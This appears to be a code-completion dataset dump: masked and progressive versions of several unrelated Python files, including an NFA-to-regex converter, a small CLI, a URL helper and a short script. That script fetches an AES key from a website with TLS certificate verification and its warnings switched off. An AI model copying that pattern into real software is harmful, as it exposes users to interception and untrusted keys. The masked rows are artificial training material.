row_input = input(f'Row {row_num} (semicolon-separated values) > ')
tsq_row = list(map(lambda x: x.strip(), row_input.split(';')))
validated = True
for i, cell in enumerate(tsq_row):
if tsq_types[i] == 'number':
try:
float(cell)
except Exception as e:
print('At least one cell value is invalid.')
validated = False
break
if validated:
break
return tsq_row
def main():
config = configparser.ConfigParser()
config.read('config.ini')
db_path = config['db']['path']
conn = sqlite3.connect(db_path)
db_name = input_db_name(conn)
nlq = input_nlq()
num_cols = input_num_cols()
tsq = TableSketchQuery(num_cols)
tsq.types = input_tsq_types(num_cols)
tsq_row_count = input_tsq_row_count()
for i in range(tsq_row_count):
tsq.values.append(input_tsq_row(i+1, tsq.types))
tsq.order = input_order()
tsq.limit = input_limit()
print(tsq.to_proto())
cur = conn.cursor()
cur.execute('''INSERT INTO tasks (tid, db, nlq, tsq_proto, status, time)
VALUES (?, ?, ?, ?, ?, ?)''',
(str(uuid.uuid4()), db_name, nlq,
tsq.to_proto().SerializeToString(), 'waiting',
int(time.time())))
conn.commit()
conn.close()
if __name__ == '__main__':
main()
| [
5,
7,
9,
10,
12
] |
94 | 2fe20f28fc7bba6b8188f5068e2b3c8b87c15edc | <mask token>
def replaceNode(nfa, old, new):
if DEBUG:
print('R_Start(%s, %s) ---' % (old, new), nfa)
if old in nfa._deltas:
for input in nfa._deltas[old]:
nfa.addDelta(new, input, nfa._deltas[old][input])
del nfa._deltas[old]
if DEBUG:
print('R_SwitchedSource(%s, %s) ---' % (old, new), nfa)
deltas_temp = copyDeltas(nfa._deltas)
for src in deltas_temp:
for input in deltas_temp[src]:
if old in deltas_temp[src][input]:
nfa._deltas[src][input].remove(old)
nfa._deltas[src][input].add(new)
if DEBUG:
print('R_SwitchedDest(%s, %s) ---' % (old, new), nfa)
<mask token>
class NetworkNFA(NFA):
def __init__(self, nfa):
if type(nfa) is not NFA:
raise AutomataError('Can create a NetworkNFA only from an NFA.')
if all([(len(i) == 1) for i in nfa.charset]):
self._charset = copy(nfa._charset)
else:
self._charset = set([('{%s}' % i) for i in nfa._charset])
self._nodes = copy(nfa._nodes)
self._deltas = copyDeltas(nfa._deltas)
self._start = nfa._start
self._terminals = copy(nfa._terminals)
def addDelta(self, node, input, dest):
if set(input) - self._charset.union(set('()+*')):
raise AutomataError('%s contains symbols not in charset.' % input)
if type(node) is Node:
if type(dest) is set and all([(type(i) is Node) for i in dest]):
if len(dest):
if node in self._deltas:
if input in self._deltas[node]:
self._deltas[node][input] = self._deltas[node][
input].union(dest)
else:
self._deltas[node][input] = dest
else:
self._deltas[node] = {input: dest}
elif type(dest) is Node:
if node in self._deltas:
if input in self._deltas[node]:
self._deltas[node][input].add(dest)
else:
self._deltas[node][input] = set([dest])
else:
self._deltas[node] = {input: set([dest])}
else:
raise AutomataError(
'Delta destination must be a Node or a set of nodes, not %s.'
% type(dest).__name__)
else:
raise AutomataError('Delta source must be Node, not %s.' % type
(node).__name__)
def remDelta(self, node, input):
if set(input) - self._charset.union(set('()+*')):
raise AutomataError('%s contains symbols not in charset.' % input)
if type(node) is Node:
if node in self._deltas and input in self._deltas[node]:
self._deltas[node].pop(input)
if len(self._deltas[node]) == 0:
del self._deltas[node]
else:
raise AutomataError('Delta source must be a Node, not %s' %
type(node).__name__)
def isValid(self):
if len(self._nodes) == 0:
return False
if self._start not in self._nodes:
return False
for i in self._terminals:
if i not in self._nodes:
return False
if not set(self._deltas.keys()).issubset(self._nodes):
return False
for key in self._deltas:
for char in self._deltas[key]:
if set(char) - self._charset.union(set('()+*')):
return False
return True
def apply(self, input, start):
raise AutomataError('NetworkNFA does not allow direct application.')
def __repr__(self):
ret = '<NetworkNFA>\n'
ret += ' Charset: {%s}\n' % ','.join(filter(None, self._charset))
ret += ' Nodes: {%s}\n' % ','.join([i.label for i in self._nodes])
ret += 'Terminals: {%s}\n' % ','.join([i.label for i in self.
_terminals])
ret += ' Start: %s\n' % (self._start and self._start.label)
ret += ' Delta: '
if len(self._deltas):
for qFrom in self._deltas:
for input in self._deltas[qFrom]:
ret += 'D(%s, %s) -> {%s}\n ' % (qFrom.label,
input or 'lambda', ','.join([i.label for i in self.
_deltas[qFrom][input]]))
ret = ret.rstrip() + '\n'
else:
ret += 'None\n'
ret += ' Valid: %s\n' % ('Yes' if self.isValid() else 'No')
ret += '</NetworkNFA>'
return ret
<mask token>
| <mask token>
def copyDeltas(src):
out = dict()
for k in src:
out[k] = dict()
for k2 in src[k]:
out[k][k2] = copy(src[k][k2])
return out
def replaceNode(nfa, old, new):
if DEBUG:
print('R_Start(%s, %s) ---' % (old, new), nfa)
if old in nfa._deltas:
for input in nfa._deltas[old]:
nfa.addDelta(new, input, nfa._deltas[old][input])
del nfa._deltas[old]
if DEBUG:
print('R_SwitchedSource(%s, %s) ---' % (old, new), nfa)
deltas_temp = copyDeltas(nfa._deltas)
for src in deltas_temp:
for input in deltas_temp[src]:
if old in deltas_temp[src][input]:
nfa._deltas[src][input].remove(old)
nfa._deltas[src][input].add(new)
if DEBUG:
print('R_SwitchedDest(%s, %s) ---' % (old, new), nfa)
<mask token>
class NetworkNFA(NFA):
def __init__(self, nfa):
if type(nfa) is not NFA:
raise AutomataError('Can create a NetworkNFA only from an NFA.')
if all([(len(i) == 1) for i in nfa.charset]):
self._charset = copy(nfa._charset)
else:
self._charset = set([('{%s}' % i) for i in nfa._charset])
self._nodes = copy(nfa._nodes)
self._deltas = copyDeltas(nfa._deltas)
self._start = nfa._start
self._terminals = copy(nfa._terminals)
def addDelta(self, node, input, dest):
if set(input) - self._charset.union(set('()+*')):
raise AutomataError('%s contains symbols not in charset.' % input)
if type(node) is Node:
if type(dest) is set and all([(type(i) is Node) for i in dest]):
if len(dest):
if node in self._deltas:
if input in self._deltas[node]:
self._deltas[node][input] = self._deltas[node][
input].union(dest)
else:
self._deltas[node][input] = dest
else:
self._deltas[node] = {input: dest}
elif type(dest) is Node:
if node in self._deltas:
if input in self._deltas[node]:
self._deltas[node][input].add(dest)
else:
self._deltas[node][input] = set([dest])
else:
self._deltas[node] = {input: set([dest])}
else:
raise AutomataError(
'Delta destination must be a Node or a set of nodes, not %s.'
% type(dest).__name__)
else:
raise AutomataError('Delta source must be Node, not %s.' % type
(node).__name__)
def remDelta(self, node, input):
if set(input) - self._charset.union(set('()+*')):
raise AutomataError('%s contains symbols not in charset.' % input)
if type(node) is Node:
if node in self._deltas and input in self._deltas[node]:
self._deltas[node].pop(input)
if len(self._deltas[node]) == 0:
del self._deltas[node]
else:
raise AutomataError('Delta source must be a Node, not %s' %
type(node).__name__)
def isValid(self):
if len(self._nodes) == 0:
return False
if self._start not in self._nodes:
return False
for i in self._terminals:
if i not in self._nodes:
return False
if not set(self._deltas.keys()).issubset(self._nodes):
return False
for key in self._deltas:
for char in self._deltas[key]:
if set(char) - self._charset.union(set('()+*')):
return False
return True
def apply(self, input, start):
raise AutomataError('NetworkNFA does not allow direct application.')
def __repr__(self):
ret = '<NetworkNFA>\n'
ret += ' Charset: {%s}\n' % ','.join(filter(None, self._charset))
ret += ' Nodes: {%s}\n' % ','.join([i.label for i in self._nodes])
ret += 'Terminals: {%s}\n' % ','.join([i.label for i in self.
_terminals])
ret += ' Start: %s\n' % (self._start and self._start.label)
ret += ' Delta: '
if len(self._deltas):
for qFrom in self._deltas:
for input in self._deltas[qFrom]:
ret += 'D(%s, %s) -> {%s}\n ' % (qFrom.label,
input or 'lambda', ','.join([i.label for i in self.
_deltas[qFrom][input]]))
ret = ret.rstrip() + '\n'
else:
ret += 'None\n'
ret += ' Valid: %s\n' % ('Yes' if self.isValid() else 'No')
ret += '</NetworkNFA>'
return ret
<mask token>
| <mask token>
def copyDeltas(src):
out = dict()
for k in src:
out[k] = dict()
for k2 in src[k]:
out[k][k2] = copy(src[k][k2])
return out
def replaceNode(nfa, old, new):
if DEBUG:
print('R_Start(%s, %s) ---' % (old, new), nfa)
if old in nfa._deltas:
for input in nfa._deltas[old]:
nfa.addDelta(new, input, nfa._deltas[old][input])
del nfa._deltas[old]
if DEBUG:
print('R_SwitchedSource(%s, %s) ---' % (old, new), nfa)
deltas_temp = copyDeltas(nfa._deltas)
for src in deltas_temp:
for input in deltas_temp[src]:
if old in deltas_temp[src][input]:
nfa._deltas[src][input].remove(old)
nfa._deltas[src][input].add(new)
if DEBUG:
print('R_SwitchedDest(%s, %s) ---' % (old, new), nfa)
<mask token>
class NetworkNFA(NFA):
def __init__(self, nfa):
if type(nfa) is not NFA:
raise AutomataError('Can create a NetworkNFA only from an NFA.')
if all([(len(i) == 1) for i in nfa.charset]):
self._charset = copy(nfa._charset)
else:
self._charset = set([('{%s}' % i) for i in nfa._charset])
self._nodes = copy(nfa._nodes)
self._deltas = copyDeltas(nfa._deltas)
self._start = nfa._start
self._terminals = copy(nfa._terminals)
def addDelta(self, node, input, dest):
if set(input) - self._charset.union(set('()+*')):
raise AutomataError('%s contains symbols not in charset.' % input)
if type(node) is Node:
if type(dest) is set and all([(type(i) is Node) for i in dest]):
if len(dest):
if node in self._deltas:
if input in self._deltas[node]:
self._deltas[node][input] = self._deltas[node][
input].union(dest)
else:
self._deltas[node][input] = dest
else:
self._deltas[node] = {input: dest}
elif type(dest) is Node:
if node in self._deltas:
if input in self._deltas[node]:
self._deltas[node][input].add(dest)
else:
self._deltas[node][input] = set([dest])
else:
self._deltas[node] = {input: set([dest])}
else:
raise AutomataError(
'Delta destination must be a Node or a set of nodes, not %s.'
% type(dest).__name__)
else:
raise AutomataError('Delta source must be Node, not %s.' % type
(node).__name__)
def remDelta(self, node, input):
if set(input) - self._charset.union(set('()+*')):
raise AutomataError('%s contains symbols not in charset.' % input)
if type(node) is Node:
if node in self._deltas and input in self._deltas[node]:
self._deltas[node].pop(input)
if len(self._deltas[node]) == 0:
del self._deltas[node]
else:
raise AutomataError('Delta source must be a Node, not %s' %
type(node).__name__)
def isValid(self):
if len(self._nodes) == 0:
return False
if self._start not in self._nodes:
return False
for i in self._terminals:
if i not in self._nodes:
return False
if not set(self._deltas.keys()).issubset(self._nodes):
return False
for key in self._deltas:
for char in self._deltas[key]:
if set(char) - self._charset.union(set('()+*')):
return False
return True
def apply(self, input, start):
raise AutomataError('NetworkNFA does not allow direct application.')
def __repr__(self):
ret = '<NetworkNFA>\n'
ret += ' Charset: {%s}\n' % ','.join(filter(None, self._charset))
ret += ' Nodes: {%s}\n' % ','.join([i.label for i in self._nodes])
ret += 'Terminals: {%s}\n' % ','.join([i.label for i in self.
_terminals])
ret += ' Start: %s\n' % (self._start and self._start.label)
ret += ' Delta: '
if len(self._deltas):
for qFrom in self._deltas:
for input in self._deltas[qFrom]:
ret += 'D(%s, %s) -> {%s}\n ' % (qFrom.label,
input or 'lambda', ','.join([i.label for i in self.
_deltas[qFrom][input]]))
ret = ret.rstrip() + '\n'
else:
ret += 'None\n'
ret += ' Valid: %s\n' % ('Yes' if self.isValid() else 'No')
ret += '</NetworkNFA>'
return ret
def nfa2regex(nfa):
if not nfa.isValid():
raise AutomataError(
'NFA must be in a valid state to be converted to a regex.')
network = NetworkNFA(nfa)
if DEBUG:
print('START', network)
start = Node('qs')
network.addNode(start)
network.addDelta(start, '', network.start)
network.start = start
end = Node('qf')
network.addNode(end)
for i in network.terminals:
network.addDelta(i, '', end)
network.remTerminal(i)
network.addTerminal(end)
if DEBUG:
print('Dummies added: ', network)
for src in network.nodes:
delta_temp = network.getDelta(src)
for dest in network.nodes:
chars = []
for input in delta_temp:
if input and dest in delta_temp[input]:
chars.append(input)
if len(chars):
for c in chars:
delta_temp[c].remove(dest)
if len(delta_temp[c]) == 0:
del delta_temp[c]
if len(chars) > 1:
chars = '(' + '+'.join(chars) + ')'
else:
chars = '+'.join(chars)
network.addDelta(src, chars, dest)
if DEBUG:
print('Collapsed: ', network)
pliableNodes = list(network.nodes)
pliableNodes.remove(network.start)
for n in network.terminals:
pliableNodes.remove(n)
nodeFinalDist = {}
maxDist = len(network.nodes) ** len(network.nodes)
for n in network.nodes:
nodeFinalDist[n] = maxDist
nodeFinalDist[network.terminals[0]] = 0
toProcess = list(network.nodes)
toProcess.remove(network.terminals[0])
while len(toProcess):
for node in toProcess:
dests = network.getDelta(node).values()
if len(dests) == 0:
dests = set([])
else:
dests = reduce(set.union, network.getDelta(node).values())
if len(dests) == 0:
toProcess.remove(node)
else:
minDist = min([nodeFinalDist[i] for i in dests])
if minDist != maxDist:
nodeFinalDist[node] = minDist + 1
toProcess.remove(node)
pliableNodes.sort(key=lambda x: nodeFinalDist[x], reverse=True)
if DEBUG:
print('Pliables: ', pliableNodes)
for node in pliableNodes:
network.remNode(node)
delta = copy(network.getDelta(node))
loops = []
for input in delta:
if node in delta[input]:
if len(input):
loops.append(input)
loopRegex = '+'.join(loops)
if len(loopRegex) > 1 and not (loopRegex[0] == '(' and loopRegex[-1
] == ')'):
loopRegex = '(' + loopRegex + ')*'
elif len(loopRegex) >= 1:
loopRegex = loopRegex + '*'
for input in copy(delta):
if delta[input] == set([node]):
del delta[input]
elif node in delta[input]:
delta[input].remove(node)
if '' in delta and (len(delta) != 1 or len(delta['']) != 1):
eligible = []
for dest in delta['']:
delta_temp = network.getDelta(dest)
if '' in delta_temp and node in delta_temp['']:
eligible.append(dest)
if len(eligible):
replaceNode(network, node, eligible[0])
continue
try:
del network._deltas[node]
except KeyError:
continue
if DEBUG:
print('Working on connections: ', node, delta)
deltas_temp = copyDeltas(network._deltas)
for src in deltas_temp:
for input in deltas_temp[src]:
tempDeltaDest = network.getDelta(src)[input]
if node in tempDeltaDest:
tempDeltaDest.remove(node)
if len(tempDeltaDest) == 0:
network.remDelta(src, input)
for input2 in delta:
for dest in delta[input2]:
if not (src == dest and input + loopRegex +
input2 == ''):
network.addDelta(src, input + loopRegex +
input2, dest)
if DEBUG:
print('New Delta:', src, input,
loopRegex, input2, dest, network)
branches = network.getDelta(network.start).keys()
if len(branches) == 1:
regex = branches[0]
else:
prefix = commonprefix(branches)
suffix = commonsuffix(branches)
branches = [(i[len(prefix):-len(suffix)] if len(suffix) else i[len(
prefix):]) for i in branches]
branches.sort(key=len)
if len(prefix) or len(suffix):
regex = prefix + '(' + '+'.join([(i or LAMBDA) for i in branches]
) + ')' + suffix
else:
regex = '+'.join([(i or LAMBDA) for i in branches]) or PHI
return regex
| from util import AutomataError
from automata import NFA
from base import Node
from copy import copy, deepcopy
from os.path import commonprefix
DEBUG = False
LAMBDA = u'λ'
PHI = u'Ø'
def copyDeltas(src):
out = dict()
for k in src:
out[k] = dict()
for k2 in src[k]:
out[k][k2] = copy(src[k][k2])
return out
def replaceNode(nfa, old, new):
if DEBUG:
print('R_Start(%s, %s) ---' % (old, new), nfa)
if old in nfa._deltas:
for input in nfa._deltas[old]:
nfa.addDelta(new, input, nfa._deltas[old][input])
del nfa._deltas[old]
if DEBUG:
print('R_SwitchedSource(%s, %s) ---' % (old, new), nfa)
deltas_temp = copyDeltas(nfa._deltas)
for src in deltas_temp:
for input in deltas_temp[src]:
if old in deltas_temp[src][input]:
nfa._deltas[src][input].remove(old)
nfa._deltas[src][input].add(new)
if DEBUG:
print('R_SwitchedDest(%s, %s) ---' % (old, new), nfa)
def commonsuffix(seq):
def reverse(s):
out = ''
for c in reversed(s):
out += c
return out
seq = [reverse(i) for i in seq]
return reverse(commonprefix(seq))
class NetworkNFA(NFA):
def __init__(self, nfa):
if type(nfa) is not NFA:
raise AutomataError('Can create a NetworkNFA only from an NFA.')
if all([(len(i) == 1) for i in nfa.charset]):
self._charset = copy(nfa._charset)
else:
self._charset = set([('{%s}' % i) for i in nfa._charset])
self._nodes = copy(nfa._nodes)
self._deltas = copyDeltas(nfa._deltas)
self._start = nfa._start
self._terminals = copy(nfa._terminals)
def addDelta(self, node, input, dest):
if set(input) - self._charset.union(set('()+*')):
raise AutomataError('%s contains symbols not in charset.' % input)
if type(node) is Node:
if type(dest) is set and all([(type(i) is Node) for i in dest]):
if len(dest):
if node in self._deltas:
if input in self._deltas[node]:
self._deltas[node][input] = self._deltas[node][
input].union(dest)
else:
self._deltas[node][input] = dest
else:
self._deltas[node] = {input: dest}
elif type(dest) is Node:
if node in self._deltas:
if input in self._deltas[node]:
self._deltas[node][input].add(dest)
else:
self._deltas[node][input] = set([dest])
else:
self._deltas[node] = {input: set([dest])}
else:
raise AutomataError(
'Delta destination must be a Node or a set of nodes, not %s.'
% type(dest).__name__)
else:
raise AutomataError('Delta source must be Node, not %s.' % type
(node).__name__)
def remDelta(self, node, input):
if set(input) - self._charset.union(set('()+*')):
raise AutomataError('%s contains symbols not in charset.' % input)
if type(node) is Node:
if node in self._deltas and input in self._deltas[node]:
self._deltas[node].pop(input)
if len(self._deltas[node]) == 0:
del self._deltas[node]
else:
raise AutomataError('Delta source must be a Node, not %s' %
type(node).__name__)
def isValid(self):
if len(self._nodes) == 0:
return False
if self._start not in self._nodes:
return False
for i in self._terminals:
if i not in self._nodes:
return False
if not set(self._deltas.keys()).issubset(self._nodes):
return False
for key in self._deltas:
for char in self._deltas[key]:
if set(char) - self._charset.union(set('()+*')):
return False
return True
def apply(self, input, start):
raise AutomataError('NetworkNFA does not allow direct application.')
def __repr__(self):
ret = '<NetworkNFA>\n'
ret += ' Charset: {%s}\n' % ','.join(filter(None, self._charset))
ret += ' Nodes: {%s}\n' % ','.join([i.label for i in self._nodes])
ret += 'Terminals: {%s}\n' % ','.join([i.label for i in self.
_terminals])
ret += ' Start: %s\n' % (self._start and self._start.label)
ret += ' Delta: '
if len(self._deltas):
for qFrom in self._deltas:
for input in self._deltas[qFrom]:
ret += 'D(%s, %s) -> {%s}\n ' % (qFrom.label,
input or 'lambda', ','.join([i.label for i in self.
_deltas[qFrom][input]]))
ret = ret.rstrip() + '\n'
else:
ret += 'None\n'
ret += ' Valid: %s\n' % ('Yes' if self.isValid() else 'No')
ret += '</NetworkNFA>'
return ret
def nfa2regex(nfa):
if not nfa.isValid():
raise AutomataError(
'NFA must be in a valid state to be converted to a regex.')
network = NetworkNFA(nfa)
if DEBUG:
print('START', network)
start = Node('qs')
network.addNode(start)
network.addDelta(start, '', network.start)
network.start = start
end = Node('qf')
network.addNode(end)
for i in network.terminals:
network.addDelta(i, '', end)
network.remTerminal(i)
network.addTerminal(end)
if DEBUG:
print('Dummies added: ', network)
for src in network.nodes:
delta_temp = network.getDelta(src)
for dest in network.nodes:
chars = []
for input in delta_temp:
if input and dest in delta_temp[input]:
chars.append(input)
if len(chars):
for c in chars:
delta_temp[c].remove(dest)
if len(delta_temp[c]) == 0:
del delta_temp[c]
if len(chars) > 1:
chars = '(' + '+'.join(chars) + ')'
else:
chars = '+'.join(chars)
network.addDelta(src, chars, dest)
if DEBUG:
print('Collapsed: ', network)
pliableNodes = list(network.nodes)
pliableNodes.remove(network.start)
for n in network.terminals:
pliableNodes.remove(n)
nodeFinalDist = {}
maxDist = len(network.nodes) ** len(network.nodes)
for n in network.nodes:
nodeFinalDist[n] = maxDist
nodeFinalDist[network.terminals[0]] = 0
toProcess = list(network.nodes)
toProcess.remove(network.terminals[0])
while len(toProcess):
for node in toProcess:
dests = network.getDelta(node).values()
if len(dests) == 0:
dests = set([])
else:
dests = reduce(set.union, network.getDelta(node).values())
if len(dests) == 0:
toProcess.remove(node)
else:
minDist = min([nodeFinalDist[i] for i in dests])
if minDist != maxDist:
nodeFinalDist[node] = minDist + 1
toProcess.remove(node)
pliableNodes.sort(key=lambda x: nodeFinalDist[x], reverse=True)
if DEBUG:
print('Pliables: ', pliableNodes)
for node in pliableNodes:
network.remNode(node)
delta = copy(network.getDelta(node))
loops = []
for input in delta:
if node in delta[input]:
if len(input):
loops.append(input)
loopRegex = '+'.join(loops)
if len(loopRegex) > 1 and not (loopRegex[0] == '(' and loopRegex[-1
] == ')'):
loopRegex = '(' + loopRegex + ')*'
elif len(loopRegex) >= 1:
loopRegex = loopRegex + '*'
for input in copy(delta):
if delta[input] == set([node]):
del delta[input]
elif node in delta[input]:
delta[input].remove(node)
if '' in delta and (len(delta) != 1 or len(delta['']) != 1):
eligible = []
for dest in delta['']:
delta_temp = network.getDelta(dest)
if '' in delta_temp and node in delta_temp['']:
eligible.append(dest)
if len(eligible):
replaceNode(network, node, eligible[0])
continue
try:
del network._deltas[node]
except KeyError:
continue
if DEBUG:
print('Working on connections: ', node, delta)
deltas_temp = copyDeltas(network._deltas)
for src in deltas_temp:
for input in deltas_temp[src]:
tempDeltaDest = network.getDelta(src)[input]
if node in tempDeltaDest:
tempDeltaDest.remove(node)
if len(tempDeltaDest) == 0:
network.remDelta(src, input)
for input2 in delta:
for dest in delta[input2]:
if not (src == dest and input + loopRegex +
input2 == ''):
network.addDelta(src, input + loopRegex +
input2, dest)
if DEBUG:
print('New Delta:', src, input,
loopRegex, input2, dest, network)
branches = network.getDelta(network.start).keys()
if len(branches) == 1:
regex = branches[0]
else:
prefix = commonprefix(branches)
suffix = commonsuffix(branches)
branches = [(i[len(prefix):-len(suffix)] if len(suffix) else i[len(
prefix):]) for i in branches]
branches.sort(key=len)
if len(prefix) or len(suffix):
regex = prefix + '(' + '+'.join([(i or LAMBDA) for i in branches]
) + ')' + suffix
else:
regex = '+'.join([(i or LAMBDA) for i in branches]) or PHI
return regex
| from util import AutomataError
from automata import NFA
from base import Node
from copy import copy, deepcopy
from os.path import commonprefix
DEBUG = False
LAMBDA = u'\u03bb'
PHI = u'\u00d8'
def copyDeltas(src):
out = dict()
for k in src:
out[k] = dict()
for k2 in src[k]:
out[k][k2] = copy(src[k][k2])
return out
def replaceNode(nfa, old, new):
if DEBUG:
print('R_Start(%s, %s) ---' % (old, new), nfa)
if old in nfa._deltas:
for input in nfa._deltas[old]:
nfa.addDelta(new, input, nfa._deltas[old][input])
del nfa._deltas[old]
if DEBUG:
print('R_SwitchedSource(%s, %s) ---' % (old, new), nfa)
deltas_temp = copyDeltas(nfa._deltas)
for src in deltas_temp:
for input in deltas_temp[src]:
if old in deltas_temp[src][input]:
nfa._deltas[src][input].remove(old)
nfa._deltas[src][input].add(new)
if DEBUG:
print('R_SwitchedDest(%s, %s) ---' % (old, new), nfa)
def commonsuffix(seq):
def reverse(s):
out = ''
for c in reversed(s):
out += c
return out
seq = [reverse(i) for i in seq]
return reverse(commonprefix(seq))
class NetworkNFA(NFA):
def __init__(self, nfa):
if type(nfa) is not NFA:
raise AutomataError('Can create a NetworkNFA only from an NFA.')
if all([len(i) == 1 for i in nfa.charset]):
self._charset = copy(nfa._charset)
else:
self._charset = set(['{%s}' % i for i in nfa._charset])
self._nodes = copy(nfa._nodes)
self._deltas = copyDeltas(nfa._deltas)
self._start = nfa._start
self._terminals = copy(nfa._terminals)
def addDelta(self, node, input, dest):
if set(input) - (self._charset.union(set('()+*'))):
raise AutomataError('%s contains symbols not in charset.' % input)
if type(node) is Node:
if type(dest) is set and all([type(i) is Node for i in dest]):
if len(dest):
if node in self._deltas:
if input in self._deltas[node]:
self._deltas[node][input] = self._deltas[node][input].union(
dest)
else:
self._deltas[node][input] = dest
else:
self._deltas[node] = {input: dest}
elif type(dest) is Node:
if node in self._deltas:
if input in self._deltas[node]:
self._deltas[node][input].add(dest)
else:
self._deltas[node][input] = set([dest])
else:
self._deltas[node] = {input: set([dest])}
else:
raise AutomataError(
'Delta destination must be a Node or a set of nodes, not %s.' % type(dest).__name__)
else:
raise AutomataError(
'Delta source must be Node, not %s.' % type(node).__name__)
def remDelta(self, node, input):
if set(input) - (self._charset.union(set('()+*'))):
raise AutomataError('%s contains symbols not in charset.' % input)
if type(node) is Node:
if node in self._deltas and input in self._deltas[node]:
self._deltas[node].pop(input)
if len(self._deltas[node]) == 0:
del self._deltas[node]
else:
raise AutomataError(
'Delta source must be a Node, not %s' % type(node).__name__)
def isValid(self):
if len(self._nodes) == 0:
return False
if self._start not in self._nodes:
return False
for i in self._terminals:
if i not in self._nodes:
return False
if not set(self._deltas.keys()).issubset(self._nodes):
return False
for key in self._deltas:
for char in self._deltas[key]:
if set(char) - (self._charset.union(set('()+*'))):
return False
return True
def apply(self, input, start):
raise AutomataError('NetworkNFA does not allow direct application.')
def __repr__(self):
ret = '<NetworkNFA>\n'
ret += ' Charset: {%s}\n' % ','.join(filter(None, self._charset))
ret += ' Nodes: {%s}\n' % ','.join([i.label for i in self._nodes])
ret += 'Terminals: {%s}\n' % ','.join(
[i.label for i in self._terminals])
ret += ' Start: %s\n' % (self._start and self._start.label)
ret += ' Delta: '
if len(self._deltas):
for qFrom in self._deltas:
for input in self._deltas[qFrom]:
ret += 'D(%s, %s) -> {%s}\n ' % (qFrom.label, input or 'lambda', ','.join(
[i.label for i in self._deltas[qFrom][input]]))
ret = ret.rstrip() + '\n'
else:
ret += 'None\n'
ret += ' Valid: %s\n' % ('Yes' if self.isValid() else 'No')
ret += '</NetworkNFA>'
return ret
def nfa2regex(nfa):
if not nfa.isValid():
raise AutomataError(
'NFA must be in a valid state to be converted to a regex.')
network = NetworkNFA(nfa)
if DEBUG:
print('START', network)
# Take care of multi-terminals
# if len(network.terminals) > 1:
## end = Node('qf')
# network.addNode(end)
# for i in copy(network.terminals):
## network.addDelta(i, '', end)
# network.remTerminal(i)
# network.addTerminal(end)
# Add a dummy start and end nodes
start = Node('qs')
network.addNode(start)
network.addDelta(start, '', network.start)
network.start = start
end = Node('qf')
network.addNode(end)
for i in network.terminals:
network.addDelta(i, '', end)
network.remTerminal(i)
network.addTerminal(end)
if DEBUG:
print('Dummies added: ', network)
# Collapse connections
for src in network.nodes:
delta_temp = network.getDelta(src)
for dest in network.nodes:
chars = []
for input in delta_temp:
if input and dest in delta_temp[input]:
chars.append(input)
if len(chars):
for c in chars:
delta_temp[c].remove(dest)
if len(delta_temp[c]) == 0:
del delta_temp[c]
if len(chars) > 1:
chars = '(' + '+'.join(chars) + ')'
else:
chars = '+'.join(chars)
network.addDelta(src, chars, dest)
if DEBUG:
print('Collapsed: ', network)
# Collect pliable nodes
pliableNodes = list(network.nodes)
pliableNodes.remove(network.start)
for n in network.terminals:
pliableNodes.remove(n)
# Build a distance-from-terminal table
nodeFinalDist = {}
maxDist = len(network.nodes) ** len(network.nodes) # Lazy
for n in network.nodes:
nodeFinalDist[n] = maxDist
nodeFinalDist[network.terminals[0]] = 0
toProcess = list(network.nodes)
toProcess.remove(network.terminals[0])
while len(toProcess):
for node in toProcess:
dests = network.getDelta(node).values()
if len(dests) == 0:
dests = set([])
else:
dests = reduce(set.union, network.getDelta(node).values())
if len(dests) == 0:
toProcess.remove(node)
else:
minDist = min([nodeFinalDist[i] for i in dests])
if minDist != maxDist:
nodeFinalDist[node] = minDist + 1
toProcess.remove(node)
# Sort pliable nodes by distance from terminal
pliableNodes.sort(key=lambda x: nodeFinalDist[x], reverse=True)
if DEBUG:
print('Pliables: ', pliableNodes)
for node in pliableNodes:
# Remove Node
network.remNode(node)
# Save delta
delta = copy(network.getDelta(node))
# Convert loops to regex
loops = []
for input in delta:
if node in delta[input]:
if len(input):
loops.append(input)
loopRegex = '+'.join(loops)
if len(loopRegex) > 1 and not (loopRegex[0] == '(' and loopRegex[-1] == ')'):
loopRegex = '(' + loopRegex + ')*'
elif len(loopRegex) >= 1:
loopRegex = loopRegex + '*'
# Remove loops
for input in copy(delta):
if delta[input] == set([node]):
del delta[input]
elif node in delta[input]:
delta[input].remove(node)
# Search lambda-closure equivalence
if '' in delta and (len(delta) != 1 or len(delta['']) != 1):
eligible = []
for dest in delta['']:
delta_temp = network.getDelta(dest)
if '' in delta_temp and node in delta_temp['']:
eligible.append(dest)
if len(eligible):
replaceNode(network, node, eligible[0])
continue
# Remove delta
try:
del network._deltas[node]
except KeyError: # No deltas remaining, had only loops
continue
if DEBUG:
print('Working on connections: ', node, delta)
# Check all possible connections through this node
deltas_temp = copyDeltas(network._deltas)
for src in deltas_temp:
for input in deltas_temp[src]:
tempDeltaDest = network.getDelta(src)[input]
if node in tempDeltaDest:
tempDeltaDest.remove(node)
if len(tempDeltaDest) == 0:
network.remDelta(src, input)
for input2 in delta:
for dest in delta[input2]:
if not (src == dest and (input + loopRegex + input2) == ''):
network.addDelta(
src, input + loopRegex + input2, dest)
if DEBUG:
print('New Delta:', src, input,
loopRegex, input2, dest, network)
# Extract common prefix/suffix
branches = network.getDelta(network.start).keys()
if len(branches) == 1:
regex = branches[0]
else:
prefix = commonprefix(branches)
suffix = commonsuffix(branches)
branches = [i[len(prefix):-len(suffix)] if len(suffix) else i[len(prefix):]
for i in branches]
branches.sort(key=len)
if len(prefix) or len(suffix):
regex = prefix + \
'(' + '+'.join([i or LAMBDA for i in branches]) + ')' + suffix
else:
regex = '+'.join([i or LAMBDA for i in branches]) or PHI
return regex
| [
8,
9,
10,
13,
14
] |
95 | aa579025cacd11486a101b2dc51b5ba4997bf84a | <mask token>
| class UrlPath:
<mask token>
| class UrlPath:
@staticmethod
def combine(*args):
result = ''
for path in args:
result += path if path.endswith('/') else '{}/'.format(path)
return result
| class UrlPath:
@staticmethod
def combine(*args):
result = ''
for path in args:
result += path if path.endswith('/') else '{}/'.format(path)
#result = result[:-1]
return result | null | [
0,
1,
2,
3
] |
96 | a1304f290e0346e7aa2e22d9c2d3e7f735b1e8e7 |
# We don't need no stinking models but django likes this file to be there if you are an app
| null | null | null | [
0,
1
] |
|
97 | 368e209f83cc0cade81791c8357e01e7e3f940c8 | <mask token>
| <mask token>
urllib3.disable_warnings()
<mask token>
print(key.decode('ascii'))
| <mask token>
urllib3.disable_warnings()
response = requests.get('https://freeaeskey.xyz', verify=False)
data = response.text.encode('utf-8')
key = data[data.index(b'<b>') + 3:data.index(b'</b>')]
print(key.decode('ascii'))
| import requests
import urllib3
urllib3.disable_warnings()
response = requests.get('https://freeaeskey.xyz', verify=False)
data = response.text.encode('utf-8')
